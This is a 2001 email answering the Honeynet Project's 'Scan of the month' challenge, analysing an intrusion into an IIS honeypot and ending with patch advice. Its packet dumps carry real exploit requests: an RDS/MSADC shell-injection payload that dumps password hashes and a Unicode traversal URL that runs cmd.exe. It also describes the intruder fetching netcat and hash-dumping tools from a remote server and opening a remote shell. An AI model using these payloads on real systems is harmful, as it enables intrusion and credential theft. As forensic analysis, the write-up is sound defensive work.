From armando_leite@hotmail.com Fri Apr 20 20:30:05 2001 Date: Tue, 10 Apr 2001 12:07:46 -0000 From: Armando Leite To: project@honeynet.org Subject: Scan of the month Hey guys, Excellent project. Excellent development opportunity for all those submitting entries! cheers, Armando ********************************************************************** Which exploit(s) were used to attack the system? ********************************************************************** Vulnerability 1 - RDS/IIS Vulnerability - Bugtraq ID 529 This can be seen from the following packetdump (amongst SEVERAL others): ----- 02/04-13:34:15.232822 213.116.251.162:1799 -> 172.16.1.106:80 TCP TTL:111 TOS:0x0 ID:11249 IpLen:20 DgmLen:753 DF ***AP*** Seq: 0x965E643C Ack: 0x2CB6D00A Win: 0x2238 TcpLen: 50 4F 53 54 20 2F 6D 73 61 64 63 2F 6D 73 61 64 POST /msadc/msad 63 73 2E 64 6C 6C 2F 41 64 76 61 6E 63 65 64 44 cs.dll/AdvancedD 61 74 61 46 61 63 74 6F 72 79 2E 51 75 65 72 79 ataFactory.Query 20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D HTTP/1.1..User- 41 67 65 6E 74 3A 20 41 43 54 49 56 45 44 41 54 Agent: ACTIVEDAT 41 0D 0A 48 6F 73 74 3A 20 6C 61 62 2E 77 69 72 A..Host: lab.wir 65 74 72 69 70 2E 6E 65 74 0D 0A 43 6F 6E 74 65 etrip.net..Conte 6E 74 2D 4C 65 6E 67 74 68 3A 20 35 35 39 0D 0A nt-Length: 559.. 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 Connection: Keep 2D 41 6C 69 76 65 0D 0A 0D 0A 41 44 43 43 6C 69 -Alive....ADCCli 65 6E 74 56 65 72 73 69 6F 6E 3A 30 31 2E 30 36 entVersion:01.06 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 ..Content-Type: 6D 75 6C 74 69 70 61 72 74 2F 6D 69 78 65 64 3B multipart/mixed; 20 62 6F 75 6E 64 61 72 79 3D 21 41 44 4D 21 52 boundary=!ADM!R 4F 58 21 59 4F 55 52 21 57 4F 52 4C 44 21 3B 20 OX!YOUR!WORLD!; 6E 75 6D 2D 61 72 67 73 3D 33 0D 0A 0D 0A 2D 2D num-args=3....-- 21 41 44 4D 21 52 4F 58 21 59 4F 55 52 21 57 4F !ADM!ROX!YOUR!WO 52 4C 44 21 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 RLD!..Content-Ty ... 00 65 00 20 00 43 00 69 00 74 00 79 00 3D 00 27 .e. .C.i.t.y.=.' 00 7C 00 73 00 68 00 65 00 6C 00 6C 00 28 00 22 .|.s.h.e.l.l.(." 00 63 00 6D 00 64 00 20 00 2F 00 63 00 20 00 70 .c.m.d. ./.c. .p 00 64 00 75 00 6D 00 70 00 2E 00 65 00 78 00 65 .d.u.m.p...e.x.e 00 20 00 3E 00 3E 00 20 00 6E 00 65 00 77 00 2E . .>.>. .n.e.w.. 00 70 00 61 00 73 00 73 00 22 00 29 00 7C 00 27 .p.a.s.s.".).|.' 00 08 00 B2 00 00 00 64 00 72 00 69 00 76 00 65 .......d.r.i.v.e ... ----- Vulnerability 2 - Microsoft IIS Extended Unicode Directory Traversal Vulnerability -Bugtraq ID 1806 As shown in the following packetdump: ----- 02/04-14:54:13.004647 213.116.251.162:2187 -> 172.16.1.106:80 TCP TTL:111 TOS:0x0 ID:17014 IpLen:20 DgmLen:542 DF ***AP*** Seq: 0xDEDF537B Ack: 0x2D0004E5 Win: 0x2238 TcpLen: 47 45 54 20 2F 6D 73 61 64 63 2F 2E 2E 25 43 30 GET /msadc/..%C0 25 41 46 2E 2E 2F 2E 2E 25 43 30 25 41 46 2E 2E %AF../..%C0%AF.. 2F 2E 2E 25 43 30 25 41 46 2E 2E 2F 70 72 6F 67 /..%C0%AF../prog 72 61 6D 25 32 30 66 69 6C 65 73 2F 63 6F 6D 6D ram%20files/comm 6F 6E 25 32 30 66 69 6C 65 73 2F 73 79 73 74 65 on%20files/syste 6D 2F 6D 73 61 64 63 2F 63 6D 64 31 2E 65 78 65 m/msadc/cmd1.exe 3F 2F 63 2B 64 65 6C 2B 66 74 70 63 6F 6D 20 48 ?/c+del+ftpcom H 54 54 50 2F 31 2E 31 0D 0A 41 63 63 65 70 74 3A TTP/1.1..Accept: ... ----- ********************************************************************** How were the exploits used to access and control the system? ********************************************************************** Initially the intruder creates a file using the RDS flaw with instructions to retrieve from a remote FTP server the following "tools": pdump.exe, nc.exe, samdump.dll. He tries to do this by "FTPeing" to www.nether.net, which fails (Login Incorrect - as can be see on logs related to 204.42.253.18). This happens between the following times: starting at 02/04-13:32:51.574859 213.116.251.162:1778 up to 02/04-13:34:29.400851 213.116.251.162:1803 Eventually (he fails several times before getting it right), he obtains the tools by downloading them from his own server. The whole analysis is based on reviewing all the logs available one by one. Very low-tech, but "vi" is your friend (and to be truthfull, in this case, there aren't any other options i know off...) Using nc, he runs a shell on a high port number (6969) and logs onto the server (packet 02/04-13:42:49.263766 172.16.1.106:6969 ). This shell is run using the unicode flaw. As such, the user doesn't have Admin privileges in the server when he logs in initially. ********************************************************************** What was done once access was gained? ********************************************************************** Intruder adds the anonymous user "IUSR_KENNY" and "IWAN_KENNY" to the administrators group, using the RDS bug (packet 02/04-13:56:05.379837 213.116.251.162:1946). Tries to obtain a copy of SAM._ but fails. Copies it, using the MSDAC flaw, to a file. Copies the file to the webtree and downloads it. Browses away around the filesystem, deletes files he created previously, looks in the temptive "Exploits" directory. Very repetitive what he does. Usually, failing some command in the interactive shell and then using RDS to execute it. Tries to download the tools 3 or 4 times before getting it right. ********************************************************************** How could this attack been prevented? ********************************************************************** To fix vulnerability 1: --Install the latest version of MDAC 2.1.2.4202.3 (GA) (also known as MDAC 2.1 SP2) from: http://www.microsoft.com/data/download.htm To fix vulnerability 2: Patch available IIS 4.0 -- http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp IIS 5.0 --http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp Also, depending on the purpose of the server, maybe outgoing connections should be blocked by a firewall. This would prevent the FTP session. But there would always be damage. Patch the thing. ********************************************************************** How much time did you spend on this analysis and writeup? ********************************************************************** I would say about 20 hours. There's lots of data to go through and this is just a summary, much more detail could be added. ********************************************************************** Do you feel that the attacker in question knew if this was a honeypot? If so, why or why not? ********************************************************************** I think he did. Or at somepoint realized it was. Take a look at this: 02/04-13:50:51.320224 172.16.1.106:6969 -> 213.116.251.162:1888 TCP TTL:127 TOS:0x0 ID:6523 IpLen:20 DgmLen:144 DF ***AP*** Seq: 0x2CBEF8AB Ack: 0x9E43FD5A Win: 0x1FF7 TcpLen: 65 63 68 6F 20 48 69 2C 20 69 20 6B 6E 6F 77 20 echo Hi, i know 74 68 61 74 20 74 68 69 73 20 61 20 08 08 69 73 that this a ..is 20 61 20 6C 61 62 20 73 65 72 76 65 72 2C 20 62 a lab server, b 75 74 20 70 61 74 63 68 20 74 68 65 20 68 6F 6C ut patch the hol 65 73 21 20 3A 2D 29 20 3E 3E 52 45 41 44 4D 45 es! :-) >>README 2E 4E 4F 57 2E 48 61 78 30 72 0D 0A 0D 0A 43 3A .NOW.Hax0r....C: 5C 3E 0D 0A 43 3A 5C 3E \>..C:\> And there's also the download of a file with a strange content: 02/04-14:36:02.630415 213.116.251.162:2091 -> 172.16.1.106:80 TCP TTL:111 TOS:0x0 ID:15308 IpLen:20 DgmLen:445 DF ***AP*** Seq: 0xCE616077 Ack: 0x2CEF61E1 Win: 0x2238 TcpLen: 47 45 54 20 2F 74 65 73 74 2E 74 78 74 20 48 54 GET /test.txt HT 54 50 2F 31 2E 31 0D 0A 41 63 63 65 70 74 3A 20 TP/1.1..Accept: ... 02/04-14:36:02.634340 172.16.1.106:80 -> 213.116.251.162:2091 TCP TTL:127 TOS:0x0 ID:20865 IpLen:20 DgmLen:287 DF ***AP*** Seq: 0x2CEF61E1 Ack: 0xCE61620C Win: 0x20A3 TcpLen: 48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D HTTP/1.1 200 OK. 0A 53 65 72 76 65 72 3A 20 4D 69 63 72 6F 73 6F .Server: Microso 66 74 2D 49 49 53 2F 34 2E 30 0D 0A 44 61 74 65 ft-IIS/4.0..Date 3A 20 53 75 6E 2C 20 30 34 20 46 65 62 20 32 30 : Sun, 04 Feb 20 30 31 20 31 33 3A 33 34 3A 35 38 20 47 4D 54 0D 01 13:34:58 GMT. 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t 65 78 74 2F 70 6C 61 69 6E 0D 0A 41 63 63 65 70 ext/plain..Accep 74 2D 52 61 6E 67 65 73 3A 20 62 79 74 65 73 0D t-Ranges: bytes. 0A 4C 61 73 74 2D 4D 6F 64 69 66 69 65 64 3A 20 .Last-Modified: 53 75 6E 2C 20 30 34 20 46 65 62 20 32 30 30 31 Sun, 04 Feb 2001 20 31 33 3A 33 34 3A 32 32 20 47 4D 54 0D 0A 45 13:34:22 GMT..E 54 61 67 3A 20 22 66 30 65 66 66 30 32 65 61 66 Tag: "f0eff02eaf 38 65 63 30 31 3A 62 38 35 22 0D 0A 43 6F 6E 74 8ec01:b85"..Cont 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 0D 0A ent-Length: 21.. >> 0D 0A 74 68 69 73 20 63 61 6E 27 74 20 62 65 20 ..this can't be >> 74 72 75 65 20 0D 0A true .. Which was actually created by someone else -> 202.85.60.156 TCP TTL:48 TOS:0x0 ID:6045 IpLen:20 DgmLen:76 DF ***AP*** Seq: 0x369CD047 Ack: 0x2CE1D4E7 Win: 0x7D78 TcpLen: 20 65 63 68 6F 20 74 68 69 73 20 63 61 6E 27 74 20 echo this can't 62 65 20 74 72 75 65 20 3E 20 74 65 73 74 2E 74 be true > test.t Funny to see that after the file is created there's a bunch of ppl checking the file. They were in touch with theirs mates... :) _________________________________________________________________________ Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.